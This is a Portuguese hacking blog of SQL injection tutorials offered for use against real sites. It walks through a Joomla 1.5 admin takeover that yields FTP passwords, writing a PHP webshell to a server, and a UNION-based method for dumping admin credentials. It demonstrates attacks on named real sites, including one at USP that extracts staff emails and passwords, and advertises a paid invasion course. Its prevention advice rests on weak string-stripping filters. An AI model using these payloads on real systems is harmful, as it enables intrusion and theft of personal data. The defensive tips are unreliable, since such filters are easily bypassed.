sql injection joomla 1.5 website-invadir
sql injection joomla 1.5 website, invadir este framework parecia ser dificil, mas agora com esta falha divulgada. fica tudo mais facil…
Esta falha nos dar acesso ao admin do joomla
Ache um auvo que tenha a versão do joomla 1.5 para testar.
NOSSO AUVO: www.auvo.com.br
Primeiro, temos que adicionar as variáveis via
GET: ?option=com_user&view=reset&layout=confirm
exemplo: www.auvo.com.br/?option=com_user&view=reset&layout=confirm
Abrirá uma pagina que pedirá o TOKEN(código de verificação de usuario).
Quando você entrar no link com a string ele irá pedir um Token você colocar ' ou uma aspa simples ' e vai clicar em enviar.
Veja a imagem abaixo:
Depois de clicar em enviar, ele vai pedir para informar a senha para altera-la,você apenas vai inserir a mesma senha nos dois campos e vai clicar em enviar:
É isso ai, galera.
Agora é só usufluir do mal feito. Entre no link http://www.auvo.com.br/administrator/ o Login é Admin e a senha a que você informou:
Depois clique em login.
Agora passe o Mouse sobre a aba Site e clique em configuração:
Então você irá ver 3 opções Site,Sistema,Servidor, clique na opção Servidor nesta página você vai encontrar o senha do FTP:
Agora, com o FTP. Você consegui tudo.
bY: http://www.segurancaemrede.com
Read More
como enviar arquivo-virus para um servidor com sql injection
Como enviar um arquivo virus para um servidor com sql injection – Existem varias formas de enviar um arquivo para um servidor, porem neste caso iremos utilizar a forma do sql injection.
A maioria das pessoas sabe que a injeção SQL permite que atacantes para recuperar registros do banco de dados, passe telas de login, alterar conteudo no banco de dados, porem poucas pessoas sabem que é possivel enviar um arquivo para o servidor através do banco de dados, ou seja, caso o servidor esteja vulneravel, o atacante pode injetar um codigo malicioso para enviar um arquivo shell, virus, arquivo em geral para o servidor e atravez do mesmo ter acesso root ao servidor do auvo.
Esquecendo o metodo iniciante para passar por telas de login e senha e ter acesso ao CMS ou area restrita, agora iremos para o metodo um pouco mais avançado.
Comando 1 – INTO OUTFILE – Criar arquivo e escrever no mesmo
MySQL tem um comando embutido que pode ser usado para criar e gravar arquivos de sistema. Este comando tem o seguinte formato:
mysql> select “aqui é o texto que ficará dentro do arquivo, neste caso .TXT” INTO OUTFILE “httpdocs/pasta/arquivo.txt”.
Uma grande desvantagem deste comando é que ele pode ser adicionado a uma consulta existente usando uma SQL para UNIÃO.
Por exemplo, pode ser anexado a seguinte consulta:
select user, password from user where user=”admin” and password=’123′ union
select “text”,2 into outfile “/tmp/file.txt” — ‘
ou seja, podemos adicionar um arquivo de modo muito facil.
Comando 2 – LOAD_FILE – ler arquivos do servidor
MySQL tem um comando interno que pode ser usado para ler arquivos arbitrários. A sintaxe é muito simples. Vamos usar este comando para o plano B.
mysql> select load_file(“path_to_file”);
Este comando arquivo que nem precisa explicar como funciona.
WEBSHELL
WebShell é uma ferramenta muito utilizada nos dias atuais.
Podemos utilizar os comandos acima para criar uma shell, sendo que nesta shell irá executar comandos a partir do navegador web. Muito usado.
Vamos criar um WebShell muito simples que irá executar comandos shell independente do sistema operacional.
Aqui está o código de uma base muito simples em PHP.
<?php echo shell_exec($_GET['cmd']); ?>
para quem não sabe ler programação, pegue um livro já e começe a ler. O comando acima está irá executar comandos a partir de codigos passados via GET, exemplo: http://www.auvo.com.br/shell.php?cmd=ls
O exemplo acima ira listar todos os arquivos e pastas do servidor.
Exploit injeção de SQL – criar web shell
Você precisa adicionar a seguinte string para o comando SQL:
UNION SELECT “<?php echo shell_exec($_GET['cmd']); ?>”, 2,3,4 INTO OUTFILE “/ var / www / html / temp / c.php” -
Algumas explicações:
• 2,3,4 são apenas qualificador que costumava fazer o mesmo número de colunas, como na primeira parte da consulta seleção.
• / var / www / html é um diretório web default nas distribuições RedHat-like (Fedora, CentOS).
BY: invkloip
Read Moreautomagic sql injection download – programa para sql injection
automagic sql injection download – programa para sql injection para download abaixo:
http://scoobygang.org/automagic.zip
Ferramenta automagic sql injection download encontra-se no link:
http://www.securiteam.com/tools/6P00L0AEKQ.html
bY: http://www.segurancaemrede.com
Read MoreComo tratar sql injection
Aqui vem mais um de meus tutoriais… E hoje vamos falar sobre, como tratar sql injection, ou seja como evitar erros de sql injection permitir ataques em meu site.
Vou dar um exemplo em PHP.
1 – Uma boa forma de evitar ataques de sql injection é retirando os principais caracteres usados em ataques maliciosos.
function nosql($string){
$string =str_replace(“‘”,”",$string);//aqui retira aspas simples <’>
$string =str_replace(“\\”,”",$string);//aqui retira barra invertida<\\>
$string =str_replace(“UNION”,”",$string);//aqui retiro o comando UNION <UNION>
return $string
}
2 – Outra forma tambem bastante usada é o comando: mysql_real_escape_string
mais informações no link: http://php.net/manual/pt_BR/function.mysql-real-escape-string.php
3 – Você pode tambem criar funcoes anti-sqlinjection para numeros/codigos.
Um exemplo bom é quando você passa um codigo via GET['codid'] ou POST['codid'].
Ao receber esta variavel via get/post você pode validar si realmente é numero ou string.
Codigo:
if (is_numeric($_GET['codid'])==false) {
$cod =get_magic_quotes_gpc() ? stripslashes($_GET['codid']) : $_GET['codid'];
$cod = function_exists("mysql_real_escape_string") ? mysql_real_escape_string($cod) : mysql_escape_string($cod);
$cod =(int)$cod;
}else{
print 'error';
header("location:error.php");
exit; }
seguranca em redes .com
Read MoreApostila com Técnicas de invasao com sql injection
Criei uma apostila com uma serie de tecnicas para excução do famoso sql injection.
Abaixo está alguns dos assuntos abordados na apostila.
COMO COMPRAR ?
Para conseguir esta apostila Basta fazer um deposito pelo pagseguro na conta do juancarloscunha606@hotmail.com, que logo após enviarei usuario e senha da area restrita para fazer download da apostila.
COMO VOU APRENDER ?
Eu auxiliarei a todos no estudo, e disponibilizarei auvos vulneraveis a ataques.
ASSUNTOS SOBRE O APOSTILA.
Mysql básico
Criando uma query
Principio do sqlinjection
O que é sqlinjection
Teoria de sqlinjection
Regras sqlinjection
Criando um sistema de login E senha para testes
Listar dados do banco de dados com sqlinjection
Burlar uma query
Burlar um sistema de login e senha
Conseguir acesso ao banco de dados
Conseguir privilégios em um sistema
Conseguir dados de um sistema
Usando parâmetro UNION
Inserindo dados no banco de dados sem permissão
Alterando dados do banco de dados sem permissão
Excluindo dados do banco de dados sem permissão
Excluindo tabelas do banco de dados sem permissão
Excluindo database sem permissão
Descobrir nomes de tabelas do banco de dados
Descobrir nome das colunas do banco de dados
Protegendo sistema de login e senha
Protegendo dados do banco
Proteção na query
Emunizando site, sistema… do sqlinjection
Para você aprender com precisão este curso você precisa de saber:
Básico em linguagem de programação
Básico em banco de dados
Read MoreExplorando falha de sql injection no site da USP.br
OBJETIVO DO POST:
Explorar um site conhecido para demostrar que todos possuem falhas…
Explicações:
Explorando falha de sql injection no site da USP.br.
Para saber quais seriam as tabelas e colunas do banco de dados, precisei de ter ferramentas avançadas que são restritas para os melhores hackers. Si você é um deles, baixe-a para facilitar sua vida hacker.
Vou demostrar uma invasao via SQL injection no site da USP(universidade de são Paulo)…
Nesta invasão consigo todos os emails de funcionários da USP(universidade de são paulo).
Vamos La:
Abaixo esta o site vulnerável
USP . br / feaecon/graduacao.php?i=21
Usando o código abaixo lista o numero 1 e 2 na tela do site.
?i=-21 union select 1,2
Explicação: o site tenta buscar o post 21 e não encontra para listar e lista os dados do segundo select que é 1,2
Agora, colocando o código ( ?i=-21 union select 1,tx_email from eae_usuario ) o site irá listar todos os emails dos usuários do banco de dados inclusive do webmail deles.
Selecione os emails e jogue eles no Word ou dreamweaver ou sei La…
Agora, iremos fazer o site listar todos os emails e senhas de todos.
Para fazer isso prefisamos usar uma concatenação no SQL.
Código:
graduacao.php?i=-21 union select 1,concat(tx_email,tx_senha) from eae_usuario
a funcao concat(tx_email, tx_senha) mostra o email e a senha na mesta coluna no db.
Read More
Apostila / Livros / tutorial sobre sql injection
Neste post abaixo vou disponibilizar nossa venda de apostilas / livros / tutoriais sobre sql injection
Eu traduzi alguns livros e também tenho outros livros já traduzidos por outras pessoas, que estou disponibilizando para todos com um baixo custo.
Esses livros são do nível iniciante ao nível avançado.
http://www.segurancaemrede.com/livros-sobre-invasao/
Read MoreExplorando falha de sql injection basica
Eae galera,
voltei a postar e estou mandando aqui um post explorando um falha de sql injection basica.
http://www.hojetecnologia.com.br/worktable/
Codigo de exploração sql injection: admin’ or usuario like ‘%a%
Para os leigos um tutorial abaixo:
Imagine que o codigo sql de validacao para logar no sistema seja
SELECT usuario, senha FROM usuarios WHERE usuario=’$usuario’ and senha=’$senha’
A falha sql injection acontece quando o programador nao trata as variaveis digitadas pelo usuario.
Uma das melhores formas de tratar é:
$usuario =str_replace(“‘”, “”,$_POST['usuario']);
$usuario =str_replace(“%”, “”,$_POST['usuario']);
$usuario =str_replace(“+”, “”,$_POST['usuario']);
$usuario =str_replace(“(“, “”,$_POST['usuario']);
$usuario =str_replace(“‘-”, “”,$_POST['usuario']);
$usuario =str_replace(“#”, “”,$_POST['usuario']);
O quanto mais os caracteres especiais voce bloquear, melhor é para a seguranca da sua area restrita.
Existem inumeras formas de explorar falhas de sql injection. A que eu usei foi a seguinte
admin’ or usuario like ‘%a%
Explicaçao:
A validacao que tem é:
SELECT usuario, senha FROM usuarios WHERE usuario=’$usuario’ and senha=’$senha’
Ou seja, selecione o usuario e a senha da tabela usuarios em que o usuario seja igual ao usuario digitado pelo usuario e a senha seja igual a senha digitada pelo usuario.
Inserçao do codigo:
SELECT usuario, senha FROM usuarios WHERE usuario=’admin’ or usuario like ‘%a%‘ and senha=’admin’ or usuario like ‘%a%‘
Ou seja,
Selecione o usuario e a senha da tabela usuarios em que o usuario seja igual a admin ou o usuario seja parecido com a letra “a” e a senha seja igual a “admin” ou a senha seja parecida com a letra “a”
Conclusao:
Muito vulneravel esta area restrita. Tao vulneravel que dá até para inserir um usuario atraves deste sql injection.
Read MoreTutorial como invadir com SQL Injection (MySQL), sql injection por method $_GET e $_POST, programa para executar o sqlinjection
C
riei este tutorial a fim de demonstrar uma das melhores formas de invasão e uma das mais usadas hoje em dia. Ate porque os programadores de hoje em dia não estão si importando com a segurança do site e suas áreas restritas.
OBS: não vou explicar aqui detalhadamente sobre os códigos sql, pois quem deseja fazer ataques sqlinjection com certeza precisa ter conhecimento sobre banco de dados.
O que é Sql Injection?
É uma vulnerabilidade existente nos dias de hoje, que si usa de uma manipulação em códigos sql. Esta vulnerabilidade permite ao atacante executar consultas ao banco de dados inserindo querys (comandos Sql) na url do site ou ate mesmo em campos de text. obtendo, assim, informações confidenciais como logins e senhas, dentre outros.
Hoje em dia são usadas muitas técnicas para explorar um banco de dados de um site servidor… Citarei algumas das técnicas.
1 – Sql Injection
A) Verificar a si existe uma Vulnerabilidade sem programa.
Vou citar um exemplo básico, para si saber si existe uma vulnerabilidade. Suponhamos que existe um site chamado “ALVO”, e esse site contem dados enviados por variáveis URL.
Código:
http://www.alvo.com/news.php?id=5
No caso acima, o nome do site é www.alvo.com, Toda vez que você ver no link de um site o sinal de interrogação seguido de alguma palavra,letra,silaba recebendo algum valor, isso quer diser que existe um dado sendo enviado de uma pagina para outra. Exemplo: ?id=5.
Isso significa que neste caso, a pagina news.php estará recebendo o.
Concerteza na pagina, chamada news.php terá um código, parecido com esse:
$id =$_post[‘id’];
E obviamente terá um código sql, parecido com esse.
Query_rs = “select * from noticias where código=’$id’”
Isso significa que a pagina news.php esta selecionando a noticia em que o codigo da noticia seja igual ao codigo da URL, que seria a variavel $id.
Agora, vamos a parte para identificarmos se o site é vulnerável, colocaremos ao final da url uma aspa simples ( ‘ ). Abaixo é mostrado a forma como a url ficará.
Código:
http://www.alvo.com/news.php?id=5′
Caso o site retorne um erro igualmente ou semelhante ao apresentado a seguir. O site é vulnerável a Sql Injection
Erro:
“You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the…
O erro acima diz que a sintase da consulta sql esta incorreta. e pede para você checar o manual correspondente ao SGBD que você está utilizando. “Até parece que você é o administrador do site”
Agora que checamos o erro no site e sabemos que este é vulnerável a injeção de Sql na url. Agora Iremos aprender a explorar esta vulnerabilidade. Com alguns macetes:
B) – Localizar a Quantidade/Número de Colunas/Tabelas do banco de dados.
Utilizaremos uma forma bastante simples para descobrir a quantidade de colunas existentes na tabela. Para encontrar a quantidade de Colunas/Tabelas é utilizado o comando ORDER BY, esse comando é colocado no fim da sintase sql, significa ordenar em formas descendente, ascendente dentre outras a suas consulta.
Mas como utilizar este comando Sql?
Ao final da url você adiciona o comando order by e vai adicionando uma sequência de Colunas, ou seja, você pode acionar a coluna correspondente. Caso queira olhar a coluna 1, ordene assim:
Código:
http://www.alvo.com/news.php?id=5 order by 1
Se não aparecer nenhum erro é por que esta Coluna número 1 existe. Para localizar a quantidade de colunas basta ir tentando ordenar todas as colunas de 1 a infinito. Lembre-se que esta vulnerabilidade necessitamos trabalhar em cima dos erros, então o ideal é você ir acrescentado valor até que o site retorne um erro dizendo que a Coluna é inexistente no banco de dados.
Código:
http://www.alvo.com/news.php?id=5 order by 1/* <– Sem erro
http://www.alvo.com/news.php?id=5 order by 1,2/* <– Sem erro
http://www.alvo.com/news.php?id=5 order by 1,2,3/* <– Sem erro
http://www.site.com/news.php?id=5 order by 1,2,3,4 <– Com erro
O exemplo acima, é atribuido Colunas (1..2..3..4), no entanto, é mencionado erro na Coluna 4. Conclui-se então que esta Coluna é inexistente e que o banco possui apenas 3 Colunas.
C) – Utilizando a função UNION.
Esta função poderosa é responsável por unir vários dados localizados em Colunas de Tabelas diferentes. “Essa é muito boa”
Vamos utilizar o exemplo abaixo para melhor exemplificar.
Código:
http://www.alvo.com/news.php?id=5 union all select 1,2,3
Explicando a Sql:
O exemplo acima vai possibilitar ao “Injectador” visualizar todas as informações contidas nas Colunas/Tabelas 1, 2 e 3 do banco.
Código:
…?id … union all select 1,2,3
Faça a união de todas as informações contidas das Colunas/Tabelas 1, 2 e 3 do site: http://www.alvo.com/news.php. Está e a ordem que você atribui ao comando colocado na url do site.
D) – Descobrindo a versão do SGBD (MySql).
Código:
http://www.alvo.com/news.php?id=5 union all select 1,2,3
Observe acima que na url o comando Sql pede para visualizar as três Colunas/Tabelas existentes no banco. Agora para visualizar a versão do banco é necessário que façamos uma substituição. Retirar a Coluna/Tabela 2 pelo comando @@version.
Código:
http://www.alvo.com/news.php?id=5 union all select 1,@@version,3
Caso não der certo, você receberá uma mensagem de erro semelhante a esta:
Citação:
“union + illegal mix of collations (IMPLICIT + COERCIBLE) …”
Para resolver este erro vamos utilizar a função convert(). Exemplo abaixo:
Código:
http://www.alvo.com/news.php?id=5 union all select 1,convert(@@version using latin1),3/
Ou então as funções hex() e unhex();
Código:
http://www.alvo.com/news.php?id=5 union all select 1,unhex(hex(@@version)),3/
Com os procedimentos acima, você irá conseguir achar a versão do SGBD MySql.
E) – Obtendo o nome da Coluna/Tabela.
Agora que temos a versão, iremos ao passo seguinte. Descobrir o nome das Colunas/Tabelas:
Geralmente os DBA’s (Administradores de Banco de Dados) utilizam nomes comuns como padronização para suas Colunas/Tabelas como:
Citação:
user, usuario, admin, member, membro, password, passwd, pwd, user_name
Lógico que isto depende bastante de DBA’s e qual tipo de padronização ele estiver utilizando.
Na consulta abaixo o “Injectador” bicuda, isto mesmo ele utiliza a técnica de tentativo-erro, para tentar acertar o nome da Coluna/Tabela.
Código:
http://www.alvo.com/news.php?id=5 union all select 1,2,3 from admin
Observe que acima a query diz: “Mostre-me os valores das Colunas/Tabelas 1, 2 e 3 do usuário admin”.
Código:
http://www.alvo.com/news.php?id=5 union all select 1,username,3 from admin
Caso apareça erro, vá mudando o nome da coluna… afinal é a técnica da tentativa e erro.
Código:
http://www.alvo.com/news.php?id=5 union all select 1,username,3 from admin/
Acima, observe que a consulta começa a ficar refinada: “Mostre-me os valores Coluna/Tabelas 1, o nome do usuário e 3 do usuário admin”. Ou seja, suponha que o DBA tenha criado um banco onde as ele separou a Tabela admin, como o exemplo. No entanto, este admin possui inumeras informações (campos) como: nome do admin (username), password, endereco, idade.. etc.
Código:
http://www.alvo.com/news.php?id=5 union all select 1,username, password from admin
Caso a consulta der certo, na tela aparecerá o nome do usuário e a senha. Esta senha aparecerá na tela tanto como texto ou criptografada, em md5 hash.. etc. Vai depender muito da base de dados onde foi desenvolvido o banco.
Para ficar com um boa aparência e organizada as informações na tela. É utilizado a função concat().
Código:
http://www.alvo.com/news.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin/*
Dependendo do campo, fica a seu critério inserir em hexadecimal (0x3a) ou utilizando o padrão Ascii (char(58)).
Código:
http://www.alvo.com/news.php?id=5 union all select 1,concat(username,char(58),password),3 from admin/*
Na tela já aparecerá os valores com o nome do usuário administrador e a senha. Faça orações para que não aparece em hash md5 senão vai ser outra guerra..
Dica: Quando está difícil para achar o nome da Coluna/Tabela, sempre é bom utilizar mysql.user, pois é muito utilizado como default e como padrão. Exemplo abaixo.
Código:
http://www.alvo.com/news.php?id=5 union all select 1,concat(user,0x3a,password),3 from mysql.user/*
F) – MySql 5.
Devido algumas diferenças atribuídas a versão 5 do MySql. É mostrado aqui uma técnica para obter o nome das Colunas/Tabelas.
Nesta nova versão, é acrescentada um arquivo chamado information_schema, onde possui informações sobre todas as Colunas/Tabelas do banco. É este arquivo que será o nosso alvo.
Código:
http://www.alvo.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables/*
Na consulta acima substituimos o campo 2 por table_name para obter a primeira tabela de information_schema.
Agora para que a consulta seja rápida é necessário acrescentar um limite para as linhas.
Observer abaixo que é colocado como limite 0, 1.
Código:
http://www.alvo.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 0,1/*
OBS: você deve ir acrescentando os valores dos limites: 1, 2; 3,4. Vai depender de você, pois vamos supor que o alvo principal é a Coluna/Tabela admin_password e está está na posição 43, então você deveria acrescentar uma por uma até achar… 1, 2; …, …; 42, 43.
Espero que tenham entendido esta parte.
Para obter o nome das colunas, também é utilizado a mesma lógica. Só que agora no arquivo information_schema.columns.
Código:
http://www.alvo.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 0,1/*
Agora vamos a uma consulta mais específica. Caso você queira que apareça informações mais específica como o nome dos usuário pode-se fazer a consulta abaixo:
Código:
http://www.alvo.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns where table_name=’users’/
Com esta consulta é visualizado o nome das colunas.. agora é só utilizar os limites para visualizar os nomes de usuários.
Caso os valores estejam em colunas diferentes (lugares) vamos concatenar utilizando o concat().
Código:
http://www.alvo.com/news.php?id=5 union all select 1,concat(user,0x3a,pass,0x3a,email) from users/*
Ferramenta de auxílio
SQL Injection 1.2 + Firefox.
https://addons.mozilla.org/pt-BR/firefox/addon/6727
Para dá apoio/auxílio na injeção dos códigos da SQL Injection, aqui é mostrado um complemento do Firefox que pode ajudá-lo bastante nesta tarefa.
O SQL Injection 1.2 que é uma complemento que nos ajuda a inserir códigos tanto em Post quanto em Get. Além de você pode memorizar todas as entradas que você adquirir, sem a necessidade de utilizar o Crtl + c e Crtl + v.
Abaixo as ilustrações mostram a facilidade de uso da ferramenta.
Acima simplesmente pedimos para mostrar o usuário, a senha e o email.
Isto é um exemplo de Sql Injection Avançado. Não é uma técnica tão simples, necessita-se de prática e conhecimento em Sql.
Para quem sabe manejar bem o sql, concerteza que com este simples tutorial, aprenderá coisas a mais do que estou ensinando. Aprenderá que para fazer um sql injection basta injetar um código em outro código.
Espero que todos tenham entendido pelo menos a essência da coisa.
A imagem 01 mostra o ícone no campo inferior do Browser. Para darmos início a execução do complemento é necessário dar um clique em cima do ícone (cadeado).
A imagem 02 mostra o complemento em si. Observe que não tem muito mistério, um campo para a escolha da String/Query e dois botões de escolha.
A imagem 3 mostra que o complemento já vem com algumas Strings, as Query’s que aparecem eu mesmo adicionei.
Mas como funciona?
A imagem 04 mostra que o SQL Injection 1.2 já fez a limitação dos campos que podem vir a receber os Strings, que na ilustração acima correspondem a Usuário, Senha, Entrar.
Para inserir é necessário que você clique em cima de qualquer um dos 3 campos do site.
A imagem 05 aparece logo após você clicar no campo desejado. Então você pode fazer a escolha de fazer a injeção por POST ou por GET.
Na imagem 06 você agora deve escolher em qual campo será inserido a String. Para isto você deve optar em clicar em um dos dois botões:
O botão Injection Code possibilita inserir a String apenas no input que você clicou anteriormente.
O botão Injection in all possibilita que a String seja inserida em todos os campos do site.
Observe que eu clique no botão Injection in all.
Pronto, logo após para iniciar a injeção basta clicar no tão Submit this form.
_____________________________________________________________________
Existem também a possibilidade de você criar e salvar as suas próprias Strings/Querys.
Para isto, basta você clicar na ícone do SQL Injection 1.2, mostrado na ilustração 01, e adicionar conforme mostrado na figura acima.
Esta ferramenta ajuda muito aqueles que são fanáticos em sql injection, assim como me ajuda muito.
Este programa é simples e pratico.
Aqueles que tiverem alguma duvida, basta me contactar.
Parceiros
